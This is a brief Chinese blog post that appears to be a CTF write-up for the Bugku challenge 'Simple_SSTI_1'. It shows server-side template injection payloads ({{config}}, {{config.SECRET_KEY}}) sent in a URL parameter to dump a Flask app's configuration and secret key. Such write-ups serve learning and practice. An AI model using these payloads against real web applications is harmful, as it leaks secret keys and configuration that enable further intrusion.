扒皮狼

 关注

[bugku]Simple_SSTI_1

扒皮狼

 关注

阅读 70

2022-03-12

题目:
在这里插入图片描述

进入页面先按F12

在这里插入图片描述
有个提示secret_key
考虑模板注入

输入url:

http://114.67.175.224:10472/?flag={{config}}

在这里插入图片描述
直接找到了flag

如果访问

http://114.67.175.224:10472/?flag={{config.SECRET_KEY}}

可以直接显示flag
在这里插入图片描述

相关推荐

一点读书

BUGKU 变量1

一点读书 100 0 0

王老师说

ssti1--Flask框架

王老师说 76 0 0

大柚子top

[bugku]-login1-sql约束攻击

大柚子top 81 0 0

颜路在路上

Bugku 逆向

颜路在路上 48 0 0

慕容冲_a4b8

SSTI漏洞基础解析

慕容冲_a4b8 63 0 0

小磊z

【Real】[Flask]SSTI

小磊z 35 0 0

成义随笔

BUGKU_CTF WEB(1-10)writeUP

成义随笔 87 0 0

天悦哥

【bugku】-newphp

天悦哥 111 0 0

有态度的萌狮子

SSTI漏洞初手入门

有态度的萌狮子 91 0 0

李雨喵

【SSTI模块注入】SSTI+Flask+Python(下):绕过过滤

李雨喵 130 0 0

精彩评论(0)

0 0 举报